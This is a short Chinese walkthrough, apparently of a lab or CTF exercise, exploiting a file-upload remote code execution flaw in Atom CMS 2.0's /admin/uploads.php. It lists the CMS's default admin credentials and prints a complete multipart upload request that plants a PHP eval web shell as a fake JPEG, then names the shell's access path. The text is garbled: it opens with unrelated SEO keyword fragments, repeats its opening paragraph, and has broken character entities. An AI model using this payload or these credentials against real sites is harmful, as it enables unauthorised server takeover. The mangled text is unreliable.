设计参考网站有哪些,做网站做系统一样么,wordpress音乐主题,网站数据库漏洞描述#xff1a;Atom CMS 2.0版本存在远程代码执行漏洞#xff0c;该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
其实这就是一个文件上传漏洞罢了。。。。
打开之后#xff0c;/home路由是个空白 信息搜集Atom CMS 2.0版本存在远程代码执行漏洞该漏洞源于/admin/uploads.php 未能正确过滤构造代码段的特殊元素。攻击者可利用该漏洞导致任意代码执行。
其实这就是一个文件上传漏洞罢了。。。。
打开之后/home路由是个空白 信息搜集该cms有默认邮箱/密码 alanalan.com/password到/admin路由下尝试登录。 Users下有个上传文件功能可能是上传头像用的。 抓包中无文件上传的内容奇奇怪怪
看了一下漏洞路由在/admin/uploads.php直接在界面中点击到不了这个路由。。。。
直接修改刚刚的包吧 直接传php文件这cms写的真shit
Content-Type: multipart/form-data; boundary---------------------------30623082103363803402542706041-----------------------------30623082103363803402542706041
Content-Disposition: form-data; namefile-----------------------------30623082103363803402542706041
Content-Disposition: form-data; namefile; filenamecmd.php
Content-Type: image/jpeg?php eval($_POST[cmd]);?
-----------------------------30623082103363803402542706041--访问木马存储路由/uploads/1707520195231.phpgetshell